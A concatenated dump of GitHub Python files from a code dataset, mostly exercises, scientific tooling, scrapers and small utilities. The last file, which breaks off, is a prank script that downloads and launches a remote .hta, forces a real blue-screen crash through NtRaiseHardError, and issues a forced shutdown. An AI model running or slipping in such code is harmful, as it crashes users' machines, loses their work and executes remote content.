self.intervals[last_interval-1]\n intervals[mapped_shard][last_interval] += part_inside_last_interval / delta\n\n self.shards_load_vect = dict(zip(self.shards, intervals))\n #print(\"WEKTORY OBCIĄŻEŃ W SŁOWNIKU\")\n #print(self.shards_load_vect)\n\n def find_wts(self):\n #changed to summing in intervals, return vector\n self.wts = [0] * (len(self.intervals))\n #print(self.wts)\n for v in self.shards_load_vect.values():\n for i in range(len(v)):\n self.wts[i] += v[i]\n #print(\"WTS\")\n #print(self.wts)\n\n def find_norm_wts(self):\n self.norm_wts = [0] * (len(self.intervals))\n for i in range(len(self.wts)):\n self.norm_wts[i] = 1/self.n_cloud_nodes*self.wts[i]\n #print(\"NORM WTS\")\n #print(self.norm_wts)\n","repo_name":"RobertDudek/shard-allocation-testing","sub_path":"TasksAllocator.py","file_name":"TasksAllocator.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35012517228","text":"#using Backtracking\ndef helper(path,k,start,target):\n if(k==0 and target==0):\n lst.append(path)\n print(path)\n return\n elif(k==0 or target<=0):\n #print(path)\n return\n for i in range(start,10):\n #print(\"I am here\")\n helper(path+[i],k-1,i+1,target-i)\nif __name__==\"__main__\":\n k=3\n target=9\n start=1\n path=[]\n lst=[]\n helper(path,k,start,target)\n print(lst)\n","repo_name":"P-Raj27/MY-DSA-PRACTICE","sub_path":"Sum of K Single Digit Elements_PR.py","file_name":"Sum of K Single Digit Elements_PR.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"31614893828","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport hal\n\ndef cmd(arg):\n subprocess.call(arg, shell=True)\n\nh = hal.component(\"linktest\")\nh.newpin(\"in\", hal.HAL_FLOAT, hal.HAL_IN)\nh.newpin(\"inout\", hal.HAL_FLOAT, hal.HAL_IO)\nh.ready()\n\n# set pin values before linking\nh['in'] = 42\nh['inout'] = 43\nassert h['in'] == 42\nassert h['inout'] == 43\n\n# make sure halcmd setp works as expected\ncmd(\"halcmd setp linktest.in 4712\")\ncmd(\"halcmd setp linktest.inout 4713\")\nassert h['in'] == 4712\nassert h['inout'] == 4713\n\n# create virgin signals\ncmd(\"halcmd newsig insig float\")\ncmd(\"halcmd newsig inoutsig float\")\n\n# link to them\ncmd(\"halcmd net insig linktest.in\")\ncmd(\"halcmd net inoutsig linktest.inout\")\n\n# verify the link did not destroy the pin values\nassert h['in'] == 4712\nassert h['inout'] == 4713\n\n# now change the pin values\nh['in'] = 815\nh['inout'] = 816\n\n# unlink the pins\ncmd(\"halcmd unlinkp linktest.in\")\ncmd(\"halcmd unlinkp linktest.inout\")\n\n# verify the unlink did not destroy the pin values\n# but are as inherited from the signal:\nassert h['in'] == 815\nassert h['inout'] == 816\n\n# the signals should be unlinked\n#cmd(\"halcmd show\")\n","repo_name":"LinuxCNC/linuxcnc","sub_path":"tests/hal-link-unlink/hallink.py","file_name":"hallink.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1555,"dataset":"github-code","pt":"68"} +{"seq_id":"40725579509","text":"import datetime\r\n\r\ndef meetup_day(myear, mmonth, mday, mday2):\r\n mdayint = 0\r\n mday2int = 0\r\n \r\n mday_dict = {'Monday':0,'Tuesday':1,'Wednesday':2,'Thursday':3,'Friday':4,'Saturday':5,'Sunday':6}\r\n mdayint = mday_dict.get(mday)\r\n \r\n mday2_dict = {'1st':0,'2nd':1,'3rd':2,'4th':3,'last':-1,'teenth':5}\r\n mday2int = mday2_dict.get(mday2)\r\n \r\n dt = datetime.date(myear,mmonth,1)\r\n dow_lst = []\r\n while dt.weekday() != mdayint:\r\n dt = dt + datetime.timedelta(days=1)\r\n while dt.month == mmonth:\r\n dow_lst.append(dt)\r\n dt = dt + datetime.timedelta(days=7)\r\n if mday2int < 4:\r\n return dow_lst[mday2int] # may raise an exception if slicing is wrong\r\n elif mday2int > 4:\r\n for choice in dow_lst:\r\n if (choice.day >= 13 and choice.day <= 19):\r\n return choice\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/meetup/94fd87afe2e546918bace71269d71969.py","file_name":"94fd87afe2e546918bace71269d71969.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"5840965562","text":"\"\"\"\nThis module contains a single class ForceField used to output a GROMACS .ff forcefield.\n\"\"\"\n\nimport os\nimport pathlib\nimport shutil\nimport typing\n\nfrom .parsers import CFG\nfrom .util import any_starts_with, backup_file, file_write_lines\n\nPathLike = typing.Union[pathlib.Path, str]\n\n\ndef copy_files(\n src_dir: pathlib.Path, dest_dir: pathlib.Path, files: typing.Iterable[str]\n) -> None:\n \"\"\"Copy files from one directory to another.\"\"\"\n for f in files:\n src_path = src_dir.joinpath(f)\n dest_path = dest_dir.joinpath(f)\n shutil.copyfile(str(src_path), str(dest_path))\n\n\nclass ForceField:\n \"\"\"\n Class used to output a GROMACS .ff forcefield\n \"\"\"\n\n def __init__(self, name: str, dir_path: PathLike = pathlib.Path(\".\")):\n \"\"\"\n Open a named forcefield directory. If it does not exist it is created.\n\n :param str name: Forcefield name to open/create\n \"\"\"\n self.directory = pathlib.Path(dir_path).joinpath(f\"ff{name}.ff\")\n backup_file(self.directory)\n self.directory.mkdir(parents=True, exist_ok=True)\n\n with open(self.directory.joinpath(\"forcefield.itp\"), \"w\") as itp:\n print(f\"#define _FF_PYCGTOOL_{name}\", file=itp)\n print('#include \"martini_v2.2.itp\"', file=itp)\n\n data_dir = pathlib.Path(__file__).parent.joinpath(\"data\")\n\n # Copy MARTINI files\n copy_files(\n data_dir,\n self.directory,\n [\n \"martini_v2.2.itp\",\n \"watermodels.dat\",\n \"w.itp\",\n ],\n )\n\n # Create atomtypes.atp required for correct masses with pdb2gmx\n atomtypes_atp = os.path.join(self.directory, \"atomtypes.atp\")\n with CFG(data_dir.joinpath(\"martini_v2.2.itp\")) as itp, open(\n atomtypes_atp, \"w\"\n ) as atomtypes:\n for toks in itp[\"atomtypes\"]:\n print(\" \".join(toks), file=atomtypes)\n\n with open(self.directory.joinpath(\"forcefield.doc\"), \"w\") as doc:\n print(f\"PyCGTOOL produced MARTINI force field - {name}\", file=doc)\n\n def write(self, filename: str, mapping, bonds):\n \"\"\"\n Write RTP and R2B files for this forcefield.\n\n :param str filename: Filename prefix to use for both files\n :param Mapping mapping: CG Mapping object\n :param Iterable[Bond] bonds: CG Bonds object\n \"\"\"\n lines, nterms, cterms = ForceField.write_rtp(mapping, bonds)\n file_write_lines(self.directory.joinpath(f\"{filename}.rtp\"), lines)\n\n lines = ForceField.write_r2b(nterms, cterms)\n file_write_lines(self.directory.joinpath(f\"{filename}.r2b\"), lines)\n\n @staticmethod\n def bond_section(bonds, section_header, multiplicity=None):\n \"\"\"\n Populate an RTP bond/angle/dihedral section.\n\n :param iterable[Bond] bonds: Iterable of bonds to add to RTP\n :param str section_header: RTP section header i.e. \"bonds\"/\"angles\"/\"dihedrals\"\n :param int multiplicity: Multiplicity of dihedral, default is None\n :return List[str]: Lines to add to RTP file\n \"\"\"\n ret_lines = []\n if bonds:\n ret_lines.append(\" [ {0:s} ]\".format(section_header))\n for bond in bonds:\n line = \" \" + \" \".join([\"{0:>4s}\".format(atom) for atom in bond.atoms])\n line += \" {0:12.5f} {1:12.5f}\".format(bond.eqm, bond.fconst)\n if multiplicity is not None:\n line += \" {0:4d}\".format(multiplicity)\n ret_lines.append(line)\n return ret_lines\n\n @staticmethod\n def needs_terminal_entries(mol_name, bondset):\n bonds = bondset.get_bonds(mol_name, natoms=-1)\n return any_starts_with(bonds, \"-\"), any_starts_with(bonds, \"+\")\n\n @staticmethod\n def write_rtp(mapping, bonds):\n \"\"\"\n Return lines of a GROMACS RTP file.\n\n This file defines the residues present in the forcefield and allows pdb2gmx to be used.\n\n :param Mapping mapping: AA->CG mapping from which to collect molecules\n :param BondSet bonds: BondSet from which to collect bonds\n :return (list[str], set[str], set[str], set[str]):\n List of lines for RTP file,\n Set of residues requiring N terminal records,\n Set of residues requiring C terminal records,\n \"\"\"\n\n def write_residue(mol_name, mol_mapping, strip=None, prepend=\"\"):\n ret_lines = [\"[ {0} ]\".format(prepend + mol_name), \" [ atoms ]\"]\n\n for bead in mol_mapping:\n # name type charge chg-group\n ret_lines.append(\n \" {:>4s} {:>4s} {:3.6f} {:4d}\".format(\n bead.name, bead.type, bead.charge, 0\n )\n )\n\n for natoms, (section, multiplicity) in enumerate(\n ((\"bonds\", None), (\"angles\", None), (\"dihedrals\", 1)), start=2\n ):\n if strip is None:\n bond_list = bonds.get_bonds(mol_name, natoms)\n else:\n bond_list = bonds.get_bonds(\n mol_name,\n natoms,\n select=lambda bond: not any_starts_with(bond, strip),\n )\n\n ret_lines.extend(\n ForceField.bond_section(bond_list, section, multiplicity)\n )\n\n return ret_lines\n\n n_terms = set()\n c_terms = set()\n\n rtp_lines = [\"[ bondedtypes ]\", (\"{:4d}\" * 8).format(1, 1, 1, 1, 1, 1, 0, 0)]\n\n for mol_name, mol_mapping in mapping.items():\n try:\n rtp_lines.extend(write_residue(mol_name, mol_mapping))\n except KeyError:\n continue\n\n needs_terminal_entry = ForceField.needs_terminal_entries(mol_name, bonds)\n\n if needs_terminal_entry[0]:\n rtp_lines.extend(\n write_residue(mol_name, mol_mapping, strip=\"-\", prepend=\"N\")\n )\n n_terms.add(mol_name)\n\n if needs_terminal_entry[1]:\n rtp_lines.extend(\n write_residue(mol_name, mol_mapping, strip=\"+\", prepend=\"C\")\n )\n c_terms.add(mol_name)\n if needs_terminal_entry[0]:\n rtp_lines.extend(\n write_residue(\n mol_name, mol_mapping, strip=(\"-\", \"+\"), prepend=\"2\"\n )\n )\n\n return rtp_lines, n_terms, c_terms\n\n @staticmethod\n def write_r2b(n_terms, c_terms):\n \"\"\"\n Return lines of a GROMACS R2B file.\n\n This file defines names used for chain terminal records for PDB2GMX.\n\n :param Iterable[str] n_terms: Set of molecule names requiring N terminal records\n :param Iterable[str] c_terms: Set of molecule names requiring C terminal records\n :return List[str]: Lines of R2B file\n \"\"\"\n ret_lines = [\n \"; rtp residue to rtp building block table\",\n \"; main N-ter C-ter 2-ter\",\n ]\n\n for resname in sorted(n_terms | c_terms):\n nter_str = (\"N\" + resname) if resname in n_terms else \"-\"\n cter_str = (\"C\" + resname) if resname in c_terms else \"-\"\n both_ter_str = (\"2\" + resname) if resname in (n_terms & c_terms) else \"-\"\n ret_lines.append(\n \"{0:5s} {0:5s} {1:5s} {2:5s} {3:5s}\".format(\n resname, nter_str, cter_str, both_ter_str\n )\n )\n\n return ret_lines\n","repo_name":"jag1g13/pycgtool","sub_path":"pycgtool/forcefield.py","file_name":"forcefield.py","file_ext":"py","file_size_in_byte":7663,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"68"} +{"seq_id":"36742518158","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\n\n\nclass HasPosition:\n def __init__(self, queryset, field):\n self.queryset = queryset\n self.field = field\n\n def __call__(self, value):\n query_filter = {self.field: value}\n try:\n self.queryset.get(**query_filter)\n except ObjectDoesNotExist:\n message = 'There is no such this position'\n raise serializers.ValidationError(message)\n","repo_name":"akademik2607/simpleshop","sub_path":"cart/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24190908159","text":"\"\"\"\nHelper functions for help with the extension.\n 1 > make_dict(word_list: str): Make the word_dict.pickle file.\n Wordlist used can be changed by changing the value of the variable WORD_LIST.\n 2 > get_anagram_hub_id(api_url: str, auth_header: dict) -> int:\n Return the seesion_id for anagram game hub.\n 3 > get_questions(api_url: str, auth_header: dict, hub_id: int):\n Generator function that looks for messages that contain a new anagram word\n and yield them without spaces and lowercased.\n Note: It is possible that some messages be skipped from in between.\n 4 > run_as_main: Call make_dict\n\"\"\"\n\nfrom collections import namedtuple, Counter\nimport pickle\nimport re\nimport requests\n\nWORD_LIST = \"wordlist.txt\"\n\n\ndef get_anagram_hub_id(api_url: str, auth_header: dict) -> int:\n \"\"\"Return the seesion_id for anagram game hub.\"\"\"\n hubs = requests.get(f\"http://{api_url}hubs\", headers=auth_header).json()\n for hub in hubs:\n if hub[\"identity\"][\"name\"] == \"Anagram Game Hub\":\n return hub[\"id\"]\n\n\ndef get_questions(api_url: str, auth_header: dict, hub_id: int):\n \"\"\"\n Generator function that looks for messages that contain a new anagram word\n and yield them without spaces and lowercased.\n Note: It is possible that some messages be skipped from in between.\n \"\"\"\n QUESTION_REGEX = re.compile(r\"\\*\\*\\* New Anagram Word is \\[ (?P(\\w\\s)+)\")\n latest_message_id = 0\n while True:\n messages = requests.get(\n f\"http://{api_url}hubs/{hub_id}/messages/5\", headers=auth_header\n ).json()\n for message in messages:\n if \"chat_message\" not in message:\n continue\n if message[\"chat_message\"][\"id\"] <= latest_message_id:\n continue\n latest_message_id = message[\"chat_message\"][\"id\"]\n match = re.search(QUESTION_REGEX, message[\"chat_message\"][\"text\"])\n if match:\n letters = match.group(\"letters\")\n yield letters.lower().replace(\" \", \"\")\n\n\ndef make_dict(word_list: str) -> None:\n \"\"\"\n Open word_list and create/overwite word_dict.pickle with the contents of processed list.\n \"\"\"\n word_dict = {}\n with open(word_list) as f:\n for word in f:\n word = word.strip()\n word_key = \"\".join(sorted(word))\n try:\n word_dict[word_key].append(word)\n except KeyError:\n word_dict[word_key] = [word]\n\n with open(\"word_dict.pickle\", \"bw+\") as f:\n pickle.dump(word_dict, f)\n\n\nif __name__ == \"__main__\":\n make_dict(WORD_LIST)\n","repo_name":"Kushagra-0801/AirDCpp-Anagram-Bot","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"43638728529","text":"#!/usr/bin/python\nfrom argparse import ArgumentTypeError\nfrom dbusclient import DBusClient, bounded\n\n\npercentage = bounded(int, 0, 100, exception_type=ArgumentTypeError)\n\nclient = DBusClient(item=\"br.ggazzi.soundctl\",\n path=\"/br/ggazzi/soundctl\",\n interface=\"br.ggazzi.soundctl\")\n\n\n\nclient.add_method('notify_volume',\n help='Issues a desktop notification with the current volume')\n\n\nmethod = client.add_method('volume_up',\n help='Increases the volume by a given amount')\nmethod.add_argument('amt', metavar='INCR', type=percentage,\n help='Amount being incremented to the volume percentage.')\n\n\nclient.add_method('volume_up_step',\n help='Increases the volume by a fixed amount.')\n\n\nmethod = client.add_method('volume_down',\n help='Decreases the volume by a given amount')\nmethod.add_argument('amt', metavar='INCR', type=percentage,\n help='Amount being decremented from the volume percentage.') \n\n\nclient.add_method('volume_down_step',\n help='Decreases the volume by a fixed amount.')\n\n\nclient.add_method('notify_outputs',\n help='Issues a notification showing the currently active output mixers.')\n\n\nclient.add_method('cycle_outputs',\n help='Cycles throught the output mixers, leaving only one of them active '\n 'at a time, and at the end of the cycle muting them all.')\n\nif __name__ == '__main__': client.run()\n","repo_name":"ggazzi/soundctld","sub_path":"src/soundctl.py","file_name":"soundctl.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40328427982","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"Miles to km converter\")\nwindow.minsize()\nwindow.config(padx=20, pady=20)\n\ndef convert_units():\n result = float(entry_box.get()) * 1.609\n result_label.config(text = result)\n\n# Labels\n\nmiles_label = Label(text=\"Miles\")\nmiles_label.grid(column=2, row=0)\n\nequal_label = Label(text=\"Equal to: \")\nequal_label.grid(column=0, row=1)\n\nresult_label = Label()\nresult_label.grid(column=1, row=1)\n\nkm_label = Label(text=\"km\")\nkm_label.grid(column=2, row=1)\n\n# button\n\nconvert_button = Button(text=\"calculate\",command = convert_units)\nconvert_button.grid(column=1, row=2)\n\n# entry\n\nentry_box = Entry(width = 5)\nentry_box.focus()\nentry_box.grid(column=1, row=0)\n\nwindow.mainloop()\n","repo_name":"mathitejeda/100_days_of_code","sub_path":"miles_to_km/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34866358827","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\n\nheaders = {'User-Agent':\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0\"} ##浏览器请求头(大部分网站没有这个请求头会报错、请务必加上哦)\nall_url = 'http://www.mzitu.com/all/' ##开始的URL地址\nstart_html = requests.get(all_url, headers = headers) ##使用requests中的get方法来获取all_url(就是:http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释\n#print(start_html.text) ##打印出start_html (请注意,concent是二进制的数据,一般用于下载图片、视频、音频、等多媒体内容是才使用concent, 对于打印网页内容请使用text)\n\nsoup = BeautifulSoup(start_html.text,'lxml') ##使用Beautifusoup来解析我们获取到的网页(‘lxml’是指定解析器)\n\nli_list = soup.find_all('li') ##使用BeautifulSoup解析网页过后就可以用找标签呐!(find_all是查找指定网页内的所有标签的意思,find_all返回的是一个列表。)\n\nfor li in li_list:\n print(li)","repo_name":"wskqukq511/code","sub_path":"mzitu/mzitu.py","file_name":"mzitu.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12626678859","text":"\"\"\"\nScrape fbref for premier league fixtures and results\n\"\"\"\nimport csv\nfrom datetime import datetime\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_fixtures_for_season(season):\n # Get season start and end\n season_start = season\n season_end = season + 1\n\n # Create standings_url\n standings_url =f\"https://fbref.com/en/comps/9/{season_start}-{season_end}/schedule/{season_start}-{season_end}-Premier-League-Scores-and-Fixtures\"\n # Get data\n data = requests.get(standings_url)\n soup = BeautifulSoup(data.text, features='lxml')\n standings = soup.select('table.stats_table')[0]\n \n main_list=[]\n for team in standings.find_all('tbody'):\n rows = team.find_all('tr')\n for i in rows:\n # round and day\n round = i.find('th',{'data-stat':'gameweek'})\n if round is not None:\n Round = round.text\n day = i.find('td',{'data-stat':'dayofweek'})\n if day is not None:\n Day=day.text\n\n\n #date\n date=i.find('td',{'data-stat':'date'})\n date = date.find('a')\n if date is not None:\n Date=date.text\n #converting date formats\n date_obj = datetime.strptime(Date, \"%Y-%m-%d\")\n Date = date_obj.strftime(\"%b %d %Y\")\n\n\n #home_team\n ht= i.find('td',{'data-stat':'home_team'})\n ht=ht.find('a')\n if ht is not None:\n Ht=ht.text\n\n #score\n sc= i.find('td',{'data-stat':'score'})\n sc=sc.find('a')\n if sc is not None:\n Sc=sc.text\n\n #away_team\n at= i.find('td',{'data-stat':'away_team'})\n at=at.find('a')\n if at is not None:\n At=at.text\n\n #each game\n if Round =='':\n continue\n game = Round + ',' + Day + ' ' + Date + ',' +Ht + ',' + Sc + ',' + At\n main_list.append(game)\n main_list.sort(key = lambda x: int(x.split(',')[0]))\n\n return main_list\n\ndef save_to_csv(data_list, filename):\n with open(filename, 'w', newline='', encoding=\"utf-8\") as file:\n writer = csv.writer(file)\n writer.writerow([\"Round\", \"Date\", \"Team 1\", \"FT\", \"Team 2\"])\n for row in data_list:\n writer.writerow(row.split(','))\n\nif __name__ == \"__main__\":\n seasons = range(2020, 2023)\n all_data = []\n for season in seasons:\n all_data.extend(scrape_fixtures_for_season(season))\n save_to_csv(all_data, '../data/csv/fixture_results.csv')\n","repo_name":"RobWilliamson15/football","sub_path":"scraping/fbref_scrape.py","file_name":"fbref_scrape.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40695349289","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nclass bob(object):\r\n def hey(inputText):\r\n\r\n inputText = inputText.strip(' \\t\\n\\r')\r\n\r\n if inputText.isupper():\r\n yelling = True\r\n else:\r\n yelling = False\r\n\r\n umlauts = ['ä', 'ö', 'ü', 'ß', 'Ä', 'Ö', 'Ü']\r\n\r\n if any(e in inputText for e in umlauts):\r\n if yelling is True:\r\n return 'Woah, chill out!'\r\n else:\r\n return 'Whatever.'\r\n\r\n if inputText != '':\r\n text = inputText[-1]\r\n else:\r\n text = ''\r\n\r\n if '!' in text or yelling is True:\r\n return 'Woah, chill out!'\r\n elif '?' in text:\r\n return 'Sure.'\r\n elif text == '':\r\n return 'Fine. Be that way!'\r\n else:\r\n return 'Whatever.'\r\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/39c2ae8760534f229928ef7ec222f040.py","file_name":"39c2ae8760534f229928ef7ec222f040.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"9915998138","text":"#%%\nimport pandas as pd \nimport os\nimport cv2\nfrom torch.utils.data import Dataset, DataLoader, RandomSampler, Subset\nimport pytorch_lightning as pl\nfrom sklearn.model_selection import train_test_split\n#%%\ndrop_ids = ['1.2.826.0.1.3680043.8.498.18630481693833135702678108074393091096']\n#%%\nclass RaznrDataset(Dataset):\n def __init__(self, df, datadir, transforms=None, sample='train'):\n self.df = df\n self.datadir = datadir\n self.transforms = transforms\n self.sample = sample\n def __len__(self):\n return len(self.df)\n def __getitem__(self, idx):\n img_id = self.df.loc[idx, 'StudyInstanceUID']\n img_path = f\"{self.datadir}/{self.sample}/{img_id}.jpg\"\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n targets = self.df.iloc[idx, 1:12].values\n if self.transforms:\n img = self.transforms(image=img)['image']\n return img, targets.astype('float32')\n\n# %%\nclass RaznrDataModule(pl.LightningDataModule):\n def __init__(self,datadir, batch_size=4, num_workers=0, val_pct=0.2, train_transforms=None, val_transforms=None, test_transforms=None):\n super(RaznrDataModule,self).__init__()\n self.datadir = datadir\n self.bs = batch_size\n self.num_workers= num_workers\n self.val_pct = val_pct\n self.train_transforms = val_transforms\n self.val_transforms = train_transforms\n self.test_transforms = test_transforms\n def prepare_data(self, *args, **kwargs):\n train_df = pd.read_csv(os.path.join(self.datadir, 'train.csv'))\n self.test_df = pd.read_csv(os.path.join(self.datadir,\"sample_submission.csv\"))\n filtered_train_df = train_df[~train_df['StudyInstanceUID'].isin(drop_ids)]\n train, val = train_test_split(filtered_train_df, test_size=self.val_pct)\n self.train_df = train.reset_index(drop=True)\n self.val_df = val.reset_index(drop=True)\n self.train_ds = RaznrDataset(self.train_df, self.datadir, transforms=self.train_transforms)\n self.val_ds = RaznrDataset(self.val_df, self.datadir, transforms=self.val_transforms)\n self.test_ds = RaznrDataset(self.test_df, self.datadir, transforms=self.test_transforms, sample='test')\n return super().prepare_data(*args, **kwargs)\n def train_dataloader(self, *args, **kwargs) -> DataLoader:\n # subset = Subset(self.train_ds, indices=range(2000))\n sampler = RandomSampler(self.train_ds)\n return DataLoader(self.train_ds, batch_size=self.bs, num_workers=self.num_workers, sampler=sampler)\n def val_dataloader(self, *args, **kwargs) -> DataLoader:\n return DataLoader(self.val_ds, batch_size=self.bs, num_workers=self.num_workers)\n def test_dataloader(self, *args, **kwargs) -> DataLoader:\n return DataLoader(self.test_ds, batch_size=self.bs, num_workers=self.num_workers)","repo_name":"kiansierra/kaggle-ranzcr","sub_path":"datamodules.py","file_name":"datamodules.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2820915940","text":"import argparse\nfrom concurrent.futures import ThreadPoolExecutor\nimport io\nimport os\nfrom typing import Optional, Any, Dict\n\nfrom library.lib import TTS\n# from library.lib import InferenceBackend\nfrom library.lib.wavfile import write\n\nbase = os.path.abspath(os.path.dirname(__name__))\n\nmax_thread_workers: Optional[int] = None\ntts_settings: Dict[str, Any] = {\"noise_scale\": 0.667, \"length_scale\": 1.0}\nvoc_settings: Dict[str, Any] = {\"denoiser_strength\": 0.005}\n\n\ndef main(args):\n # backend = InferenceBackend(\"pytorch\")\n executor = ThreadPoolExecutor(max_workers=max_thread_workers)\n tts = TTS(voice_or_lang=args.name,\n vocoder_or_quality=args.quality,\n backend=\"pytorch\",\n tts_settings=tts_settings,\n vocoder_settings=voc_settings,\n executor=executor,\n denoiser_strength=voc_settings[\"denoiser_strength\"],\n custom_voices_dir=f\"{base}/voices/\",\n )\n\n tts_results = tts.text_to_speech(text=args.text)\n for result_idx, result in enumerate(tts_results):\n with io.BytesIO() as wav_io:\n write(wav_io, result.sample_rate, result.audio)\n wav_data = wav_io.getvalue()\n if os.path.exists(args.save):\n os.remove(args.save)\n with open(args.save, mode='bx') as f:\n f.write(wav_data)\n\n\n# DIRECTORIES\nos.makedirs(\"samples\", exist_ok=True)\nos.makedirs(\"voices\", exist_ok=True)\n\n# SETTINGS\nparser = argparse.ArgumentParser()\nparser.add_argument('-t', '--text', help=\"Text to synthesize\")\nparser.add_argument('-n', '--name', help=\"Model name\")\nparser.add_argument('-s', '--save', default=\"samples/test.wav\", help=\"Save output\")\nparser.add_argument('-q', '--quality', choices=[\"high\", \"medium\", \"low\"], help=\"Text to synthesize\")\n\nif __name__ == '__main__':\n try:\n main(parser.parse_args())\n except KeyboardInterrupt:\n pass\n","repo_name":"Martin1403/Pytorch","sub_path":"03 - Larynx TTS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10923900718","text":"a = int(input(\"enter the number to check the number is prime or not ? \\n\"))\nif a > 1:\n \n for i in range(2, int(a / 2) + 1):\n \n if (a % i) == 0:\n print(a, \"is not a prime number\")\n break\n else:\n print(a, \"is a prime number\")\n","repo_name":"Shalini-jk/python_repo123","sub_path":"Programs2/Prime.py","file_name":"Prime.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40701178519","text":"#\n# Skeleton file for the Python \"Bob\" exercise.\n#\n\n# Bob answers 'Sure.' if you ask him a question.\n# He answers 'Whoa, chill out!' if you yell at him.\n# He says 'Fine. Be that way!' if you address him without actually saying anything.\n# He answers 'Whatever.' to anything else.\n\nimport unicodedata\nimport string\n\ndef remove_accents(data):\n return ''.join(x for x in unicodedata.normalize('NFKD', data) if x in string.ascii_letters)\n\ndef hey(what):\n \n #DEAL WITH UMLAUT INPUT - REPLACE ACCENT CHARS USING REMOVE_ACCENTS\n weirdchars = 0\n for i in what: \n if ord(i)>=128: weirdchars = 1\n capswords = 0\n lowerwords = 0\n if weirdchars:\n for i in what.split():\n j = remove_accents(i)\n if j.isupper():\n capswords = capswords + 1\n else:\n lowerwords = lowerwords + 1\n if capswords>lowerwords: return \"Whoa, chill out!\"\n else: return \"Whatever.\"\n\n #CHECK FOR SHOUTING - IGNORE NUMERIC WORDS\n capswords = 0\n lowerwords = 0\n for j in what.split():\n j = j.strip(',')\n if not j.isnumeric():\n if j.isupper():\n capswords = capswords + 1\n else:\n lowerwords = lowerwords + 1\n if capswords>lowerwords: return \"Whoa, chill out!\"\n\n if what.endswith('?'): return \"Sure.\"\n \n if what.isspace() or what == '': return \"Fine. Be that way!\"\n\n return \"Whatever.\"\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/ac5839ef85ce49db9569f0078e073f1c.py","file_name":"ac5839ef85ce49db9569f0078e073f1c.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"16872712103","text":"#------\nfrom ctypes import windll , c_int , c_uint , c_ulong , POINTER , byref\nfrom subprocess import check_call,DEVNULL,STDOUT\nfrom sys import executable\nfrom os import path,mkdir,getcwd,system\ntry:\n from requests import get\nexcept:\n print('The requests package has not yet been installed. Pressing enter will automatically install it.')\n gh = input()\n print('Installing...')\n check_call([executable, '-m', 'pip', 'install','requests'],stdout=DEVNULL,stderr=STDOUT)\n from requests import get\n print('Done!')\n\nfrom winsound import PlaySound,SND_ASYNC\nfrom time import sleep\n\n#------\ndef getfile():\n audio = get('https://github.com/CodeSyncio/computer-outro-downloadables/blob/main/outro.wav?raw=true')\n fake = get('https://github.com/CodeSyncio/computer-outro-downloadables/blob/main/fakebsod.hta?raw=true')\n if path.exists('outro-revamped'): pass\n else: mkdir('outro-revamped')\n open(f'{getcwd()}\\\\outro-revamped\\\\outro.wav', 'wb').write(audio.content)\n open(f'{getcwd()}\\\\outro-revamped\\\\fakebsod.hta', 'wb').write(fake.content)\n system('cls')\ndef bsod():\n nullptr = POINTER(c_int)()\n windll.ntdll.RtlAdjustPrivilege(c_uint(19) , c_uint(1) , c_uint(0) , byref(c_int()))\n windll.ntdll.NtRaiseHardError(c_ulong(0xC000007B) , c_ulong(0) , nullptr , nullptr , c_uint(6) , byref(c_uint()))\n\ndef sd():\n system('shutdown /s /t 1 -c \" \"')\n sleep(10)\n\ndef fbsod():\n system(f'start {getcwd()}/outro-revamped/fakebsod.hta')\n sleep(15)\n \ndef play():\n 